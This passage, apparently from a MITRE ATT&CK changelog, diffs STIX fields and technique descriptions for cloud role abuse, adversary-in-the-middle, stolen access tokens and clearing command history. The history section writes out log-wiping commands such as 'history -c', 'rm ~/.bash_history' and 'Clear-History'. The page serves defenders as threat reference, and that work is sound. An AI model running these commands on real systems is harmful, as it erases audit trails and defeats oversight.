Roles) This account modification may immediately follow [Create Account](https://attack.mitre.org/techniques/T1136) or other malicious account activity. Adversaries may also modify existing [Valid Accounts](https://attack.mitre.org/techniques/T1078) that they have compromised. This could lead to privilege escalation, particularly if the roles added allow for lateral movement to additional accounts. For example, in Azure AD environments, an adversary with the Application Administrator role can add [Additional Cloud Credentials](https://attack.mitre.org/techniques/T1098/001) to their application's service principal. In doing so the adversary would be able to gain the service principal’s roles and permissions, which may be different from those of the Application Administrator.(Citation: SpecterOps Azure Privilege Escalation) Similarly, in AWS environments, an adversary with appropriate permissions may be able to use the CreatePolicyVersion API to define a new version of an IAM policy or the AttachUserPolicy API to attach an IAM policy with additional or distinct permissions to a compromised user account.(Citation: Rhino Security Labs AWS Privilege Escalation) Similarly, an adversary with the Azure AD Global Administrator role can toggle the “Access management for Azure resources” option to gain the ability to assign privileged access to Azure subscriptions and virtual machines to Azure AD users, including themselves.(Citation: Azure AD to AD)
external_references[1]['source_name']Microsoft Support O365 Add Another Admin, October 2019Expel AWS Attacker
external_references[1]['description']Microsoft. (n.d.). Add Another Admin. Retrieved October 18, 2019. Brian Bahtiarian, David Blanton, Britton Manahan and Kyle Pellett. (2022, April 5). Incident report: From CLI to console, chasing an attacker in AWS. Retrieved April 7, 2022.
external_references[1]['url']https://support.office.com/en-us/article/add-another-admin-f693489f-9f55-4bd0-a637-a81ce93de22dhttps://expel.com/blog/incident-report-from-cli-to-console-chasing-an-attacker-in-aws/
x_mitre_detectionCollect usage logs from cloud administrator accounts to identify unusual activity in the assignment of roles to those accounts. Monitor for accounts assigned to admin roles that go over a certain threshold of known admins. Collect activity logs from IAM services and cloud administrator accounts to identify unusual activity in the assignment of roles to those accounts. Monitor for accounts assigned to admin roles that go over a certain threshold of known admins.
x_mitre_version1.02.1
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'SpecterOps Azure Privilege Escalation', 'description': 'Andy Robbins. (2021, October 12). Azure Privilege Escalation via Service Principal Abuse. Retrieved April 1, 2022.', 'url': 'https://posts.specterops.io/azure-privilege-escalation-via-service-principal-abuse-210ae2be2a5'}
external_references{'source_name': 'AWS IAM Policies and Permissions', 'description': 'AWS. (n.d.). Policies and permissions in IAM. Retrieved April 1, 2022.', 'url': 'https://docs.aws.amazon.com/IAM/latest/UserGuide/access_policies.html'}
external_references{'source_name': 'Google Cloud IAM Policies', 'description': 'Google Cloud. (2022, March 31). Understanding policies. Retrieved April 1, 2022.', 'url': 'https://cloud.google.com/iam/docs/policies'}
external_references{'source_name': 'Microsoft Support O365 Add Another Admin, October 2019', 'description': 'Microsoft. (n.d.). Add Another Admin. Retrieved October 18, 2019.', 'url': 'https://support.office.com/en-us/article/add-another-admin-f693489f-9f55-4bd0-a637-a81ce93de22d'}
external_references{'source_name': 'Azure AD to AD', 'description': 'Sean Metcalf. (2020, May 27). From Azure AD to Active Directory (via Azure) – An Unanticipated Attack Path. Retrieved September 28, 2022.', 'url': 'https://adsecurity.org/?p=4277'}
external_references{'source_name': 'Rhino Security Labs AWS Privilege Escalation', 'description': 'Spencer Gietzen. (n.d.). AWS IAM Privilege Escalation – Methods and Mitigation. Retrieved May 27, 2022.', 'url': 'https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/'}
x_mitre_contributorsAlex Parsons, Crowdstrike
x_mitre_contributorsChris Romano, Crowdstrike
x_mitre_contributorsWojciech Lesicki
x_mitre_contributorsPià Consigny, Tenable
x_mitre_contributorsClément Notin, Tenable
x_mitre_contributorsPraetorian
x_mitre_contributorsAlex Soler, AttackIQ
x_mitre_platformsIaaS
x_mitre_platformsSaaS
x_mitre_platformsGoogle Workspace
x_mitre_platformsAzure AD

[T1557] Adversary-in-the-Middle

Current version: 2.2

Version changed from: 2.0 → 2.2


Old Description
New Description
t1Adversaries may attempt to position themselves between two ot1Adversaries may attempt to position themselves between two o
>r more networked devices using an adversary-in-the-middle (A>r more networked devices using an adversary-in-the-middle (A
>iTM) technique to support follow-on behaviors such as [Netwo>iTM) technique to support follow-on behaviors such as [Netwo
>rk Sniffing](https://attack.mitre.org/techniques/T1040) or [>rk Sniffing](https://attack.mitre.org/techniques/T1040) or [
>Transmitted Data Manipulation](https://attack.mitre.org/tech>Transmitted Data Manipulation](https://attack.mitre.org/tech
>niques/T1565/002). By abusing features of common networking >niques/T1565/002). By abusing features of common networking 
>protocols that can determine the flow of network traffic (e.>protocols that can determine the flow of network traffic (e.
>g. ARP, DNS, LLMNR, etc.), adversaries may force a device to>g. ARP, DNS, LLMNR, etc.), adversaries may force a device to
> communicate through an adversary controlled system so they > communicate through an adversary controlled system so they 
>can collect information or perform additional actions.(Citat>can collect information or perform additional actions.(Citat
>ion: Rapid7 MiTM Basics)  Adversaries may leverage the AiTM >ion: Rapid7 MiTM Basics)  For example, adversaries may manip
>position to attempt to modify traffic, such as in [Transmitt>ulate victim DNS settings to enable other malicious activiti
>ed Data Manipulation](https://attack.mitre.org/techniques/T1>es such as preventing/redirecting users from accessing legit
>565/002). Adversaries can also stop traffic from flowing to >imate sites and/or pushing additional malware.(Citation: tti
>the appropriate destination, causing denial of service.>nt_rat)(Citation: dns_changer_trojans)(Citation: ad_blocker_
 >with_miner) Adversaries may also manipulate DNS and leverage
 > their position in order to intercept user credentials and s
 >ession cookies.(Citation: volexity_0day_sophos_FW) [Downgrad
 >e Attack](https://attack.mitre.org/techniques/T1562/010)s ca
 >n also be used to establish an AiTM position, such as by neg
 >otiating a less secure, deprecated, or weaker version of com
 >munication protocol (SSL/TLS) or encryption algorithm.(Citat
 >ion: mitm_tls_downgrade_att)(Citation: taxonomy_downgrade_at
 >t_tls)(Citation: tlseminar_downgrade_att)  Adversaries may a
 >lso leverage the AiTM position to attempt to monitor and/or 
 >modify traffic, such as in [Transmitted Data Manipulation](h
 >ttps://attack.mitre.org/techniques/T1565/002). Adversaries c
 >an setup a position similar to AiTM to prevent traffic from 
 >flowing to the appropriate destination, potentially to [Impa
 >ir Defenses](https://attack.mitre.org/techniques/T1562) and/
 >or in support of a [Network Denial of Service](https://attac
 >k.mitre.org/techniques/T1498).

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_referencesAbendan, O. (2012, June 14). How DNS Changer Trojans Direct Users to Threats. Retrieved October 28, 2021.
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User']
external_referencesCAPEC-94
values_changed
STIX FieldOld valueNew Value
modified2021-09-28 13:09:51.467000+00:002022-10-19 19:51:41.858000+00:00
descriptionAdversaries may attempt to position themselves between two or more networked devices using an adversary-in-the-middle (AiTM) technique to support follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040) or [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002). By abusing features of common networking protocols that can determine the flow of network traffic (e.g. ARP, DNS, LLMNR, etc.), adversaries may force a device to communicate through an adversary controlled system so they can collect information or perform additional actions.(Citation: Rapid7 MiTM Basics) Adversaries may leverage the AiTM position to attempt to modify traffic, such as in [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002). Adversaries can also stop traffic from flowing to the appropriate destination, causing denial of service.Adversaries may attempt to position themselves between two or more networked devices using an adversary-in-the-middle (AiTM) technique to support follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040) or [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002). By abusing features of common networking protocols that can determine the flow of network traffic (e.g. ARP, DNS, LLMNR, etc.), adversaries may force a device to communicate through an adversary controlled system so they can collect information or perform additional actions.(Citation: Rapid7 MiTM Basics) For example, adversaries may manipulate victim DNS settings to enable other malicious activities such as preventing/redirecting users from accessing legitimate sites and/or pushing additional malware.(Citation: ttint_rat)(Citation: dns_changer_trojans)(Citation: ad_blocker_with_miner) Adversaries may also manipulate DNS and leverage their position in order to intercept user credentials and session cookies.(Citation: volexity_0day_sophos_FW) [Downgrade Attack](https://attack.mitre.org/techniques/T1562/010)s can also be used to establish an AiTM position, such as by negotiating a less secure, deprecated, or weaker version of communication protocol (SSL/TLS) or encryption algorithm.(Citation: mitm_tls_downgrade_att)(Citation: taxonomy_downgrade_att_tls)(Citation: tlseminar_downgrade_att) Adversaries may also leverage the AiTM position to attempt to monitor and/or modify traffic, such as in [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002). Adversaries can setup a position similar to AiTM to prevent traffic from flowing to the appropriate destination, potentially to [Impair Defenses](https://attack.mitre.org/techniques/T1562) and/or in support of a [Network Denial of Service](https://attack.mitre.org/techniques/T1498).
external_references[1]['source_name']capecdns_changer_trojans
external_references[1]['url']https://capec.mitre.org/data/definitions/94.htmlhttps://www.trendmicro.com/vinfo/us/threat-encyclopedia/web-attack/125/how-dns-changer-trojans-direct-users-to-threats
external_references[2]['source_name']Rapid7 MiTM Basicsvolexity_0day_sophos_FW
external_references[2]['description']Rapid7. (n.d.). Man-in-the-Middle (MITM) Attacks. Retrieved March 2, 2020.Adair, S., Lancaster, T., Volexity Threat Research. (2022, June 15). DriftingCloud: Zero-Day Sophos Firewall Exploitation and an Insidious Breach. Retrieved July 1, 2022.
external_references[2]['url']https://www.rapid7.com/fundamentals/man-in-the-middle-attacks/https://www.volexity.com/blog/2022/06/15/driftingcloud-zero-day-sophos-firewall-exploitation-and-an-insidious-breach/
x_mitre_data_sources[0]Network Traffic: Network Traffic ContentWindows Registry: Windows Registry Key Modification
x_mitre_data_sources[4]Windows Registry: Windows Registry Key ModificationNetwork Traffic: Network Traffic Content
x_mitre_version2.02.2
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'taxonomy_downgrade_att_tls', 'description': "Alashwali, E. S., Rasmussen, K. (2019, January 26). What's in a Downgrade? A Taxonomy of Downgrade Attacks in the TLS Protocol and Application Protocols Using TLS. Retrieved December 7, 2021.", 'url': 'https://arxiv.org/abs/1809.05681'}
external_references{'source_name': 'ad_blocker_with_miner', 'description': 'Kuzmenko, A.. (2021, March 10). Ad blocker with miner included. Retrieved October 28, 2021.', 'url': 'https://securelist.com/ad-blocker-with-miner-included/101105/'}
external_references{'source_name': 'mitm_tls_downgrade_att', 'description': 'praetorian Editorial Team. (2014, August 19). Man-in-the-Middle TLS Protocol Downgrade Attack. Retrieved December 8, 2021.', 'url': 'https://www.praetorian.com/blog/man-in-the-middle-tls-ssl-protocol-downgrade-attack/'}
external_references{'source_name': 'Rapid7 MiTM Basics', 'description': 'Rapid7. (n.d.). Man-in-the-Middle (MITM) Attacks. Retrieved March 2, 2020.', 'url': 'https://www.rapid7.com/fundamentals/man-in-the-middle-attacks/'}
external_references{'source_name': 'tlseminar_downgrade_att', 'description': 'Team Cinnamon. (2017, February 3). Downgrade Attacks. Retrieved December 9, 2021.', 'url': 'https://tlseminar.github.io/downgrade-attacks/'}
external_references{'source_name': 'ttint_rat', 'description': 'Tu, L. Ma, Y. Ye, G. (2020, October 1). Ttint: An IoT Remote Access Trojan spread through 2 0-day vulnerabilities. Retrieved October 28, 2021.', 'url': 'https://blog.netlab.360.com/ttint-an-iot-remote-control-trojan-spread-through-2-0-day-vulnerabilities/'}
external_references{'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/94.html', 'external_id': 'CAPEC-94'}
x_mitre_contributorsMayuresh Dani, Qualys
x_mitre_contributorsNEC
x_mitre_data_sourcesApplication Log: Application Log Content
x_mitre_platformsNetwork

[T1550.001] Use Alternate Authentication Material: Application Access Token

Current version: 1.4

Version changed from: 1.2 → 1.4


Old Description
New Description
t1Adversaries may use stolen application access tokens to bypat1Adversaries may use stolen application access tokens to bypa
>ss the typical authentication process and access restricted >ss the typical authentication process and access restricted 
>accounts, information, or services on remote systems. These >accounts, information, or services on remote systems. These 
>tokens are typically stolen from users and used in lieu of l>tokens are typically stolen from users or services and used 
>ogin credentials.  Application access tokens are used to mak>in lieu of login credentials.  Application access tokens are
>e authorized API requests on behalf of a user and are common> used to make authorized API requests on behalf of a user or
>ly used as a way to access resources in cloud-based applicat> service and are commonly used as a way to access resources 
>ions and software-as-a-service (SaaS).(Citation: Auth0 - Why>in cloud and container-based applications and software-as-a-
> You Should Always Use Access Tokens to Secure APIs Sept 201>service (SaaS).(Citation: Auth0 - Why You Should Always Use 
>9) OAuth is one commonly implemented framework that issues t>Access Tokens to Secure APIs Sept 2019)   In AWS and GCP env
>okens to users for access to systems. These frameworks are u>ironments, adversaries can trigger a request for a short-liv
>sed collaboratively to verify the user and determine what ac>ed access token with the privileges of another user account.
>tions the user is allowed to perform. Once identity is estab>(Citation: Google Cloud Service Account Credentials)(Citatio
>lished, the token allows actions to be authorized, without p>n: AWS Temporary Security Credentials) The adversary can the
>assing the actual credentials of the user. Therefore, compro>n use this token to request data or perform actions the orig
>mise of the token can grant the adversary access to resource>inal account could not. If permissions for this feature are 
>s of other sites through a malicious application.(Citation: >misconfigured – for example, by allowing all users to reques
>okta)  For example, with a cloud-based email service once an>t a token for a particular account - an adversary may be abl
> OAuth access token is granted to a malicious application, i>e to gain initial access to a Cloud Account or escalate thei
>t can potentially gain long-term access to features of the u>r privileges.(Citation: Rhino Security Labs Enumerating AWS 
>ser account if a "refresh" token enabling background access >Roles)  OAuth is one commonly implemented framework that iss
>is awarded.(Citation: Microsoft Identity Platform Access 201>ues tokens to users for access to systems. These frameworks 
>9) With an OAuth access token an adversary can use the user->are used collaboratively to verify the user and determine wh
>granted REST API to perform functions such as email searchin>at actions the user is allowed to perform. Once identity is 
>g and contact enumeration.(Citation: Staaldraad Phishing wit>established, the token allows actions to be authorized, with
>h OAuth 2017)  Compromised access tokens may be used as an i>out passing the actual credentials of the user. Therefore, c
>nitial step in compromising other services. For example, if >ompromise of the token can grant the adversary access to res
>a token grants access to a victim’s primary email, the adver>ources of other sites through a malicious application.(Citat
>sary may be able to extend access to all other services whic>ion: okta)  For example, with a cloud-based email service on
>h the target subscribes by triggering forgotten password rou>ce an OAuth access token is granted to a malicious applicati
>tines. Direct API access through a token negates the effecti>on, it can potentially gain long-term access to features of 
>veness of a second authentication factor and may be immune t>the user account if a "refresh" token enabling background ac
>o intuitive countermeasures like changing passwords. Access >cess is awarded.(Citation: Microsoft Identity Platform Acces
>abuse over an API channel can be difficult to detect even fr>s 2019) With an OAuth access token an adversary can use the 
>om the service provider end, as the access can still align w>user-granted REST API to perform functions such as email sea
>ell with a legitimate workflow.>rching and contact enumeration.(Citation: Staaldraad Phishin
 >g with OAuth 2017)  Compromised access tokens may be used as
 > an initial step in compromising other services. For example
 >, if a token grants access to a victim’s primary email, the 
 >adversary may be able to extend access to all other services
 > which the target subscribes by triggering forgotten passwor
 >d routines. Direct API access through a token negates the ef
 >fectiveness of a second authentication factor and may be imm
 >une to intuitive countermeasures like changing passwords. Ac
 >cess abuse over an API channel can be difficult to detect ev
 >en from the service provider end, as the access can still al
 >ign well with a legitimate workflow.

Dropped Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_referencesAuth0. (n.d.). Why You Should Always Use Access Tokens to Secure APIs. Retrieved September 12, 2019.
dictionary_item_removed
STIX FieldOld valueNew Value
external_referencesCAPEC-593
values_changed
STIX FieldOld valueNew Value
modified2021-09-02 17:18:55.891000+00:002022-10-21 17:01:05.286000+00:00
descriptionAdversaries may use stolen application access tokens to bypass the typical authentication process and access restricted accounts, information, or services on remote systems. These tokens are typically stolen from users and used in lieu of login credentials. Application access tokens are used to make authorized API requests on behalf of a user and are commonly used as a way to access resources in cloud-based applications and software-as-a-service (SaaS).(Citation: Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019) OAuth is one commonly implemented framework that issues tokens to users for access to systems. These frameworks are used collaboratively to verify the user and determine what actions the user is allowed to perform. Once identity is established, the token allows actions to be authorized, without passing the actual credentials of the user. Therefore, compromise of the token can grant the adversary access to resources of other sites through a malicious application.(Citation: okta) For example, with a cloud-based email service once an OAuth access token is granted to a malicious application, it can potentially gain long-term access to features of the user account if a "refresh" token enabling background access is awarded.(Citation: Microsoft Identity Platform Access 2019) With an OAuth access token an adversary can use the user-granted REST API to perform functions such as email searching and contact enumeration.(Citation: Staaldraad Phishing with OAuth 2017) Compromised access tokens may be used as an initial step in compromising other services. For example, if a token grants access to a victim’s primary email, the adversary may be able to extend access to all other services which the target subscribes by triggering forgotten password routines. Direct API access through a token negates the effectiveness of a second authentication factor and may be immune to intuitive countermeasures like changing passwords. Access abuse over an API channel can be difficult to detect even from the service provider end, as the access can still align well with a legitimate workflow.Adversaries may use stolen application access tokens to bypass the typical authentication process and access restricted accounts, information, or services on remote systems. These tokens are typically stolen from users or services and used in lieu of login credentials. Application access tokens are used to make authorized API requests on behalf of a user or service and are commonly used as a way to access resources in cloud and container-based applications and software-as-a-service (SaaS).(Citation: Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019) In AWS and GCP environments, adversaries can trigger a request for a short-lived access token with the privileges of another user account.(Citation: Google Cloud Service Account Credentials)(Citation: AWS Temporary Security Credentials) The adversary can then use this token to request data or perform actions the original account could not. If permissions for this feature are misconfigured – for example, by allowing all users to request a token for a particular account - an adversary may be able to gain initial access to a Cloud Account or escalate their privileges.(Citation: Rhino Security Labs Enumerating AWS Roles) OAuth is one commonly implemented framework that issues tokens to users for access to systems. These frameworks are used collaboratively to verify the user and determine what actions the user is allowed to perform. Once identity is established, the token allows actions to be authorized, without passing the actual credentials of the user. Therefore, compromise of the token can grant the adversary access to resources of other sites through a malicious application.(Citation: okta) For example, with a cloud-based email service once an OAuth access token is granted to a malicious application, it can potentially gain long-term access to features of the user account if a "refresh" token enabling background access is awarded.(Citation: Microsoft Identity Platform Access 2019) With an OAuth access token an adversary can use the user-granted REST API to perform functions such as email searching and contact enumeration.(Citation: Staaldraad Phishing with OAuth 2017) Compromised access tokens may be used as an initial step in compromising other services. For example, if a token grants access to a victim’s primary email, the adversary may be able to extend access to all other services which the target subscribes by triggering forgotten password routines. Direct API access through a token negates the effectiveness of a second authentication factor and may be immune to intuitive countermeasures like changing passwords. Access abuse over an API channel can be difficult to detect even from the service provider end, as the access can still align well with a legitimate workflow.
external_references[1]['source_name']capecAuth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019
external_references[1]['url']https://capec.mitre.org/data/definitions/593.htmlhttps://auth0.com/blog/why-should-use-accesstokens-to-secure-an-api/
external_references[2]['source_name']Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019AWS Logging IAM Calls
external_references[2]['description']Auth0. (n.d.). Why You Should Always Use Access Tokens to Secure APIs. Retrieved September 12, 2019.AWS. (n.d.). Logging IAM and AWS STS API calls with AWS CloudTrail. Retrieved April 1, 2022.
external_references[2]['url']https://auth0.com/blog/why-should-use-accesstokens-to-secure-an-api/https://docs.aws.amazon.com/IAM/latest/UserGuide/cloudtrail-integration.html
external_references[3]['source_name']oktaAWS Temporary Security Credentials
external_references[3]['description']okta. (n.d.). What Happens If Your JWT Is Stolen?. Retrieved September 12, 2019.AWS. (n.d.). Requesting temporary security credentials. Retrieved April 1, 2022.
external_references[3]['url']https://developer.okta.com/blog/2018/06/20/what-happens-if-your-jwt-is-stolenhttps://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_temp_request.html
external_references[5]['source_name']Staaldraad Phishing with OAuth 2017Google Cloud Service Account Credentials
external_references[5]['description']Stalmans, E.. (2017, August 2). Phishing with OAuth and o365/Azure. Retrieved October 4, 2019.Google Cloud. (2022, March 31). Creating short-lived service account credentials. Retrieved April 1, 2022.
external_references[5]['url']https://staaldraad.github.io/2017/08/02/o356-phishing-with-oauth/https://cloud.google.com/iam/docs/creating-short-lived-service-account-credentials
x_mitre_detectionMonitor access token activity for abnormal use and permissions granted to unusual or suspicious applications and APIs.Monitor access token activity for abnormal use and permissions granted to unusual or suspicious applications and APIs. Additionally, administrators should review logs for calls to the AWS Security Token Service (STS) and usage of GCP service accounts in order to identify anomalous actions.(Citation: AWS Logging IAM Calls)(Citation: GCP Monitoring Service Account Usage)
x_mitre_version1.21.4
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'GCP Monitoring Service Account Usage', 'description': 'Google Cloud. (2022, March 31). Monitor usage patterns for service accounts and keys . Retrieved April 1, 2022.', 'url': 'https://cloud.google.com/iam/docs/service-account-monitoring'}
external_references{'source_name': 'okta', 'description': 'okta. (n.d.). What Happens If Your JWT Is Stolen?. Retrieved September 12, 2019.', 'url': 'https://developer.okta.com/blog/2018/06/20/what-happens-if-your-jwt-is-stolen'}
external_references{'source_name': 'Rhino Security Labs Enumerating AWS Roles', 'description': 'Spencer Gietzen. (2018, August 8). Assume the Worst: Enumerating AWS Roles through ‘AssumeRole’. Retrieved April 1, 2022.', 'url': 'https://rhinosecuritylabs.com/aws/assume-worst-aws-assume-role-enumeration'}
external_references{'source_name': 'Staaldraad Phishing with OAuth 2017', 'description': 'Stalmans, E.. (2017, August 2). Phishing with OAuth and o365/Azure. Retrieved October 4, 2019.', 'url': 'https://staaldraad.github.io/2017/08/02/o356-phishing-with-oauth/'}
external_references{'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/593.html', 'external_id': 'CAPEC-593'}
x_mitre_contributorsJen Burns, HubSpot
x_mitre_contributorsIan Davila, Tidal Cyber
x_mitre_platformsContainers
x_mitre_platformsIaaS
x_mitre_platformsAzure AD

[T1070.003] Indicator Removal: Clear Command History

Current version: 1.3

Version changed from: 1.1 → 1.3


Old Description
New Description
t1In addition to clearing system logs, an adversary may clear t1In addition to clearing system logs, an adversary may clear 
>the command history of a compromised account to conceal the >the command history of a compromised account to conceal the 
>actions undertaken during an intrusion. Various command inte>actions undertaken during an intrusion. Various command inte
>rpreters keep track of the commands users type in their term>rpreters keep track of the commands users type in their term
>inal so that users can retrace what they've done.  On Linux >inal so that users can retrace what they've done.  On Linux 
>and macOS, these command histories can be accessed in a few >and macOS, these command histories can be accessed in a few 
>different ways. While logged in, this command history is tra>different ways. While logged in, this command history is tra
>cked in a file pointed to by the environment variable <code>>cked in a file pointed to by the environment variable <code>
>HISTFILE</code>. When a user logs off a system, this informa>HISTFILE</code>. When a user logs off a system, this informa
>tion is flushed to a file in the user's home directory calle>tion is flushed to a file in the user's home directory calle
>d <code>~/.bash_history</code>. The benefit of this is that >d <code>~/.bash_history</code>. The benefit of this is that 
>it allows users to go back to commands they've used before i>it allows users to go back to commands they've used before i
>n different sessions.  Adversaries may delete their commands>n different sessions.  Adversaries may delete their commands
> from these logs by manually clearing the history (<code>his> from these logs by manually clearing the history (<code>his
>tory -c</code>) or deleting the bash history file <code>rm ~>tory -c</code>) or deleting the bash history file <code>rm ~
>/.bash_history</code>.  On Windows hosts, PowerShell has two>/.bash_history</code>.    Adversaries may also leverage a [N
> different command history providers: the built-in history a>etwork Device CLI](https://attack.mitre.org/techniques/T1059
>nd the command history managed by the <code>PSReadLine</code>/008) on network devices to clear command history data (<cod
>> module. The built-in history only tracks the commands used>e>clear logging</code> and/or <code>clear history</code>).(C
> in the current session. This command history is not availab>itation: US-CERT-TA18-106A)  On Windows hosts, PowerShell ha
>le to other sessions and is deleted when the session ends.  >s two different command history providers: the built-in hist
>The <code>PSReadLine</code> command history tracks the comma>ory and the command history managed by the <code>PSReadLine<
>nds used in all PowerShell sessions and writes them to a fil>/code> module. The built-in history only tracks the commands
>e (<code>$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLin> used in the current session. This command history is not av
>e\ConsoleHost_history.txt</code> by default). This history f>ailable to other sessions and is deleted when the session en
>ile is available to all sessions and contains all past histo>ds.  The <code>PSReadLine</code> command history tracks the 
>ry since the file is not deleted when the session ends.(Cita>commands used in all PowerShell sessions and writes them to 
>tion: Microsoft PowerShell Command History)  Adversaries may>a file (<code>$env:APPDATA\Microsoft\Windows\PowerShell\PSRe
> run the PowerShell command <code>Clear-History</code> to fl>adLine\ConsoleHost_history.txt</code> by default). This hist
>ush the entire command history from a current PowerShell ses>ory file is available to all sessions and contains all past 
>sion. This, however, will not delete/flush the <code>Console>history since the file is not deleted when the session ends.
>Host_history.txt</code> file. Adversaries may also delete th>(Citation: Microsoft PowerShell Command History)  Adversarie
>e <code>ConsoleHost_history.txt</code> file or edit its cont>s may run the PowerShell command <code>Clear-History</code> 
>ents to hide PowerShell commands they have run.(Citation: So>to flush the entire command history from a current PowerShel
>phos PowerShell command audit)(Citation: Sophos PowerShell C>l session. This, however, will not delete/flush the <code>Co
>ommand History Forensics)>nsoleHost_history.txt</code> file. Adversaries may also dele
 >te the <code>ConsoleHost_history.txt</code> file or edit its
 > contents to hide PowerShell commands they have run.(Citatio
 >n: Sophos PowerShell command audit)(Citation: Sophos PowerSh
 >ell Command History Forensics)

New Mitigations:

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User']
values_changed
STIX FieldOld valueNew Value
modified2020-10-16 18:09:48.686000+00:002022-09-01 21:58:56.496000+00:00
descriptionIn addition to clearing system logs, an adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they've done. On Linux and macOS, these command histories can be accessed in a few different ways. While logged in, this command history is tracked in a file pointed to by the environment variable HISTFILE. When a user logs off a system, this information is flushed to a file in the user's home directory called ~/.bash_history. The benefit of this is that it allows users to go back to commands they've used before in different sessions. Adversaries may delete their commands from these logs by manually clearing the history (history -c) or deleting the bash history file rm ~/.bash_history. On Windows hosts, PowerShell has two different command history providers: the built-in history and the command history managed by the PSReadLine module. The built-in history only tracks the commands used in the current session. This command history is not available to other sessions and is deleted when the session ends. The PSReadLine command history tracks the commands used in all PowerShell sessions and writes them to a file ($env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt by default). This history file is available to all sessions and contains all past history since the file is not deleted when the session ends.(Citation: Microsoft PowerShell Command History) Adversaries may run the PowerShell command Clear-History to flush the entire command history from a current PowerShell session. This, however, will not delete/flush the ConsoleHost_history.txt file. Adversaries may also delete the ConsoleHost_history.txt file or edit its contents to hide PowerShell commands they have run.(Citation: Sophos PowerShell command audit)(Citation: Sophos PowerShell Command History Forensics)In addition to clearing system logs, an adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they've done. On Linux and macOS, these command histories can be accessed in a few different ways. While logged in, this command history is tracked in a file pointed to by the environment variable HISTFILE. When a user logs off a system, this information is flushed to a file in the user's home directory called ~/.bash_history. The benefit of this is that it allows users to go back to commands they've used before in different sessions. Adversaries may delete their commands from these logs by manually clearing the history (history -c) or deleting the bash history file rm ~/.bash_history. Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to clear command history data (clear logging and/or clear history).(Citation: US-CERT-TA18-106A) On Windows hosts, PowerShell has two different command history providers: the built-in history and the command history managed by the PSReadLine module. The built-in history only tracks the commands used in the current session. This command history is not available to other sessions and is deleted when the session ends. The PSReadLine command history tracks the commands used in all PowerShell sessions and writes them to a file ($env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt by default). This history file is available to all sessions and contains all past history since the file is not deleted when the session ends.(Citation: Microsoft PowerShell Command History) Adversaries may run the PowerShell command Clear-History to flush the entire command history from a current PowerShell session. This, however, will not delete/flush the ConsoleHost_history.txt file. Adversaries may also delete the ConsoleHost_history.txt file or edit its contents to hide PowerShell commands they have run.(Citation: Sophos PowerShell command audit)(Citation: Sophos PowerShell Command History Forensics)
external_references[1]['source_name']Microsoft PowerShell Command HistorySophos PowerShell command audit
external_references[1]['description']Microsoft. (2020, May 13). About History. Retrieved September 4, 2020.jak. (2020, June 27). Live Discover - PowerShell command audit. Retrieved August 21, 2020.
external_references[1]['url']https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_history?view=powershell-7https://community.sophos.com/products/intercept/early-access-program/f/live-discover-response-queries/121529/live-discover---powershell-command-audit
external_references[2]['source_name']Sophos PowerShell command auditMicrosoft PowerShell Command History
external_references[2]['description']jak. (2020, June 27). Live Discover - PowerShell command audit. Retrieved August 21, 2020.Microsoft. (2020, May 13). About History. Retrieved September 4, 2020.
external_references[2]['url']https://community.sophos.com/products/intercept/early-access-program/f/live-discover-response-queries/121529/live-discover---powershell-command-audithttps://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_history?view=powershell-7
external_references[3]['source_name']Sophos PowerShell Command History ForensicsUS-CERT-TA18-106A
external_references[3]['description']Vikas, S. (2020, August 26). PowerShell Command History Forensics. Retrieved September 4, 2020.US-CERT. (2018, April 20). Alert (TA18-106A) Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020.
external_references[3]['url']https://community.sophos.com/products/malware/b/blog/posts/powershell-command-history-forensicshttps://www.us-cert.gov/ncas/alerts/TA18-106A
x_mitre_version1.11.3
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Sophos PowerShell Command History Forensics', 'description': 'Vikas, S. (2020, August 26). PowerShell Command History Forensics. Retrieved September 4, 2020.', 'url': 'https://community.sophos.com/products/malware/b/blog/posts/powershell-command-history-forensics'}
